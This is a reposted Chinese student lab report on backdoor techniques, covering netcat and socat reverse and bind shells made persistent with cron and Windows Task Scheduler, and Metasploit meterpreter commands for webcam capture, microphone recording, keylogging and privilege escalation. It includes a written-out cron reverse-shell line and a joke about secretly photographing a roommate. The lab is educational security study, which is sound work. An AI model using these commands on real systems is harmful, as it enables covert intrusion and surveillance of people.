20155308 《网络攻防》 Exp2 后门原理与实践

最新推荐文章于 2024-10-31 22:54:55 发布
最新推荐文章于 2024-10-31 22:54:55 发布
阅读量202 收藏
点赞数
文章标签: 操作系统 shell 运维
原文链接:http://www.cnblogs.com/JIUSHA/p/8708065.html
版权

20155308 《网络攻防》 Exp2 后门原理与实践

学习内容:使用nc实现win,mac,Linux间的后门连接

:meterpraeter的应用

:MSF POST 模块的应用

学习目标:建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。

基础问题回答

  1. 例举你能想到的一个后门进入到你系统中的可能方式?
  • 在网上下载软件的时候,有一些捆绑软件一起下载;
  • 在输入网页的时候不小心打错了地址,然后进入了一个和自己目标网页相似的携带木马的网站。
  • 网页上弹出的小广告,在关闭的时候,不小心点进去。
  • 自己的U盘被人植入了木马

2.例举你知道的后门如何启动起来(win及linux)的方式?

  • 对后门程序进行伪装,诱骗用户点击启动;

3.Meterpreter有哪些给你映像深刻的功能?

  • 直接通过指令获取主机的摄像头让我佷感兴趣,觉得如果这块命令掌握的好的话,可以偷偷照点室友的丑照。

4.如何发现自己有系统有没有被安装后门?

  • 经常查看自己的文件夹有没有陌生的文件。但是这个办法很笨。。。
  • 检查防火墙开启的端口和它对应的进程,如果不是系统默认开启的端口都有嫌疑,找到对应的进程,对其进行抓包分析;
  • 下载监控软件,看是否存在异常。

NC 或 netcat

是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。

  • Linux: 一般自带netcat,"man netcat" 或"man nc"可查看其使用说明。
  • Windows: 课程主页附件中下载ncat.rar解压即可使用。

  • Mac: 系统自带,"man nc",查看其使用说明。

    Win获得Linux Shell

  • 在Windows下,先使用ipconfig指令查看本机IP

1071573-20180402225459153-1189607985.png
1071573-20180402225501315-1194587135.png

  • 课程主页附件中下载ncat.rar解压即可使用。
  1. windows 打开监听

1071573-20180402225935378-140817072.png

  1. Linux反弹连接win

1071573-20180402225842954-1851602600.png

  1. windows下获得一个linux shell,可运行任何指令,如ls

1071573-20180402225502977-246010678.png

Linux获得Windows Shell

  • 在Kali环境下用ifconfig查看IP

1071573-20180402225505246-1055971745.png

  1. Linux运行监听指令

1071573-20180402231224796-473778641.png

  1. Windows反弹连接Linux

1071573-20180402231145312-1830511151.png

  1. Linux下看到Windows的命令提示

1071573-20180402230947526-344409867.png

nc传输数据

  • Windows下监听5308端口

1071573-20180402232009056-1298610872.png

  • Kali下连接到Windows的5308端口

1071573-20180402232012084-668348813.png

  • 数据传输成功!

1071573-20180402231741806-750796925.png
1071573-20180402231741537-915527414.png

实验内容

使用netcat获取主机操作Shell,cron启动

  • 在Windows系统下,监听5308端口

1071573-20180403124135313-185843293.png

  • 在Kali环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行

1071573-20180403124137444-2145054002.png

  • 用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器

1071573-20180403124141809-574729144.png

  • 在最后一行添加32 * * * * /bin/netcat 192.168.44.129 5208 -e /bin/sh,意思是在每个小时的第32分钟反向连接Windows主机的5308端口

1071573-20180403124149631-1135812950.png

  • 32分后,此时已经获得了Kali的shell,可以输入指令输出结果:

1071573-20180403124138937-1356681370.png

做到这部分的之后,我在虚拟机上下载server 2008,kali直接崩掉了,我又重新下载了一次kali,地址就变化了。新的地址是

1071573-20180403134200877-1964900599.png

1071573-20180403131508154-1489004308.png

使用socat获取主机操作Shell, 任务计划启动

预备知识;

  • socat是ncat的增强版,它使用的格式是socat [options] ,其中两个address是必选项,而options 是可选项。

  • socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

实践过程:

  1. 在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:

1071573-20180403131657509-1356208915.png

  1. 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5308 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5308,同时把cmd.exe的stderr重定向到stdout上:

1071573-20180403131619186-1238105535.png

  1. 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:

1071573-20180403131621102-1980754473.png

此时可以发现已经成功获得了一个cmd shell

1071573-20180403134830617-531233917.png

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.输入指令生成后门程序:

1071573-20180403140508654-219926434.png

2.通过nc指令将生成的后门程序传送到Windows主机上:

1071573-20180403140730770-1234823024.png
1071573-20180403140732224-176342009.png

3.在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

1071573-20180403211316504-977845336.png

4.设置完成后,执行监听:

1071573-20180403211317539-2114350220.png

5.打开Windows上的后门程序:

1071573-20180403211518026-2070620761.png

6.此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:

1071573-20180403211908003-1155794318.png

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  1. 使用record_mic指令可以截获一段音频:

1071573-20180403212035511-249871403.png

  1. 使用webcam_snap指令可以使用摄像头进行拍照:

1071573-20180403212640555-743567019.png

  1. 使用webcam stream指令可以使用摄像头进行录像:

1071573-20180403212736425-1271473800.png

  1. 使用screenshot指令可以进行截屏:

1071573-20180403212801959-267532366.png

  1. 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

1071573-20180403212905188-1921841.png

  1. 先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功

1071573-20180403213435489-490328794.png

体会

本次实验比较简单,但是主要的是自己在操作上有很大的问题,然后做到最后,虚拟机因为同时运行很多的虚拟机,所以系统卡了,整个虚拟机崩了。我就做了好几遍,才出来现在的效果。通过本次实验,我遇到了很多的问题,其中一些的问题,是同学们都没遇到,我上网也查了,也不知道怎么解决。。。。。。但是后来我发现,有的时候重开虚拟机,很多问题就莫名其妙就解决了,这也是让我很无语的地方。

转载于:https://www.cnblogs.com/JIUSHA/p/8708065.html

WFS12300
关注
网络攻防原理与技术第3版课后习题参考答案
06-22
网络攻防原理与技术的知识点总结 本文总结了《网络攻防原理与技术(第 3 版)》课后习题参考答案中的重要知识点,涵盖网络安全、攻防技术、安全服务、身份鉴别、访问控制、加密、数字签名、安全机制等方面。 一、...
网络攻防|Web后门知识详解
weixin_42282189的博客
10-26 5992
作者: h0we777 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 简介 web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。 0x01 Webshell是什么 1.1 Shell(计算机壳.
#20155235 《网络攻防》 实验二 后门原理实践
weixin_30236595的博客
04-03 299
20155235 《网络攻防》 实验二 后门原理实践 实验目的 建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或soca...
20155321 《网络攻防Exp2 后门原理实践
weixin_30797199的博客
03-28 127
20155321 《网络攻防Exp2 后门原理实践 实验内容 例举你能想到的一个后门进入到你系统中的可能方式? 我觉得人们在平时上网的时候可能会无意识地点击到一些恶意的网站,这些网站本身可能被黑客植入了木马程序,这些程序可能会随着人们下载到本地而有机会进入到系统中。 例举你知道的后门如何启动起来(win及linux)的方式? 我所知道的是可能是黑客通过远程控制的办法是输入命令使后门程序启动...
无线网络攻防原理实践
06-07
无线网络攻防原理实践
网络攻防技术与实践
11-17
在介绍每一部分网络攻防技术之后,通过一些自主设计, 和从社区借鉴的实践作业,来引导读者在具体实战答题过程中,更加深入, 地去理解所讲解的攻防理论知识与技术原理,并培养核心的安全攻防实战,技能。
《无线网络攻防原理实践》易平主编
06-30
《无线网络攻防原理实践》易平主编 清华大学出版社 适合出血者
网络攻防原理第01讲网络对抗概述
10-28
参考书目包括吴礼发、洪征、李华波的《网络攻防原理》,胡建伟、汤建龙、杨绍全等的《网络对抗原理》,闫宏生、王雪莉、杨军等的《计算机网络安全与防护》等。 课程内容包括网络安全事件、网络对抗相关概念、网络...
uuu 与 uuu.auto
Interview_TC的博客
10-28 834
UUU 工具中的“USB Serial Download Mode”是一种特殊的启动模式,用于当 SoC 没有检测到可用的启动介质(如 eMMC、SD 卡或其他有效的引导加载器)时,将自动进入此模式,以便与 UUU 工具进行数据传输和通信。在此模式下,SoC 会不断地等待通过 USB 传输数据,以便于 UUU 工具可以将所需的固件烧录到目标存储设备中。对于 i.MX 系列的开发板,通常需要配置特定的 DIP 开关或设置 Boot 模式以进入 USB Serial Download Mode。
如何在Linux系统中使用LVM进行磁盘管理
qq_36287830的博客
10-29 1035
LVM是一种将多个物理磁盘合并成一个或多个逻辑卷的机制,使得磁盘管理更加方便。通过本文,你已经学习了如何在Linux系统中使用LVM进行磁盘管理。我们介绍了LVM的基本概念、安装方法、创建物理卷、卷组、逻辑卷、格式化和挂载逻辑卷、扩展逻辑卷、调整卷组、使用LVM快照、监控LVM状态、备份与恢复、LVM与RAID、LVM与加密、LVM与快照克隆以及LVM的高级特性等内容。掌握了这些知识,将有助于你在实际工作中更好地管理Linux系统的存储资源。
MS010-17永恒之蓝漏洞复现
zhongyuekang820的博客
10-29 590
同时,该病毒与普通勒索病毒不同,其不会对电脑中的每个文件都进行加密,而是通过加密硬盘驱动器主文件表(MFT),使主引导记录(MBR)不可操作,通过占用物理磁盘上的文件名,大小和位置的信息来限制对完整系统的访问,从而让电脑无法启动,相较普通勒索病毒对系统更具破坏性。SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;
C++中获取硬盘ID的方法
道亦无名
10-27 52
如果你只是需要唯一地标识一个系统或硬盘,并且不需要非常具体的硬件信息,那么考虑使用其他方法,如生成一个基于系统配置的唯一标识符(如使用UUID库生成一个UUID),或者依赖于操作系统的某些唯一属性(如Windows上的SID或Linux上的某些系统文件内容)。在C++中,直接获取硬盘的ID(通常是硬盘的序列号或唯一标识符)并不是一项简单的任务,因为这通常涉及到低级的硬件访问,这通常是由操作系统或特定的硬件驱动程序管理的。由于直接访问硬盘ID涉及到系统安全和隐私,许多操作系统和硬件制造商都限制了这种访问。
鸿蒙开发:ArkTS GridCol容器组件
10-28 614
ArkTS支持多范式编程,包括面向对象编程、函数式编程和响应式编程,为开发者提供了更多的编程选择和灵活性。今天给大家分享ArkTS GridCol容器组件技术知识,如果有所帮助,大家点点关注支持一下,也可以联系上我一起学习。
Linux系统内核态和用户态
2301_76197086的博客
10-28 382
详解Linux系统中用户态和内核态,以及相关补充知识
SQL Server 可观测最佳实践
观测云的博客
10-28 822
实践介绍如何通过观测云监控自建的 SQL Server,帮助我们及时识别数据库性能瓶颈和潜在问题,确保数据库高效运行和稳定性。
鸿蒙ArkTS中的面向对象编程
最新发布
dawn0718的专栏
10-31 256
ArkTS作为一门面向对象语言,了解和掌握它的面向对象(封装、继承、多态)、面向接口、面向抽象的知识很有必要。
Windows10 任务栏缩略图(预览)大小设置脚本&还原脚本
qq_31745863的博客
10-29 359
主要目的是修改下图缩略图的大小
大型商场应急响应系统开发:SpringBoot篇
2401_85439108的博客
10-29 732
6、网络上的客户端和服务器可以用来编程任何独立的编程环境,也有中国,GB2312,BIG5,日文写作,一般基金,用于支持多国语言,并且可以嵌入在数据表和其他软件shift_jis访问柱可以用作的名称。2、支持多种操作系统AIX的,FreeBSD下,HP-UX,Linux和Mac OS中,Novell公司的Netware,OpenBSD系统,OS/2裹时,Solaris,Windows等。编程语言,如C, C ++,Python和Java的,的Perl,PHP,埃菲尔铁塔,Ruby和Tcl的。
Linux 常用命令
HKJ_numb1的博客
10-23 1018
Linux作为现在世界第一大操作系统,有着开源、稳定、安全、自由、社区支持等优势,想要使用Linux那一定要了解其中的相关命令,本篇文章我就来和大家分享一些Linux 的常见命令,来帮助大家可以快速上手Linux。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值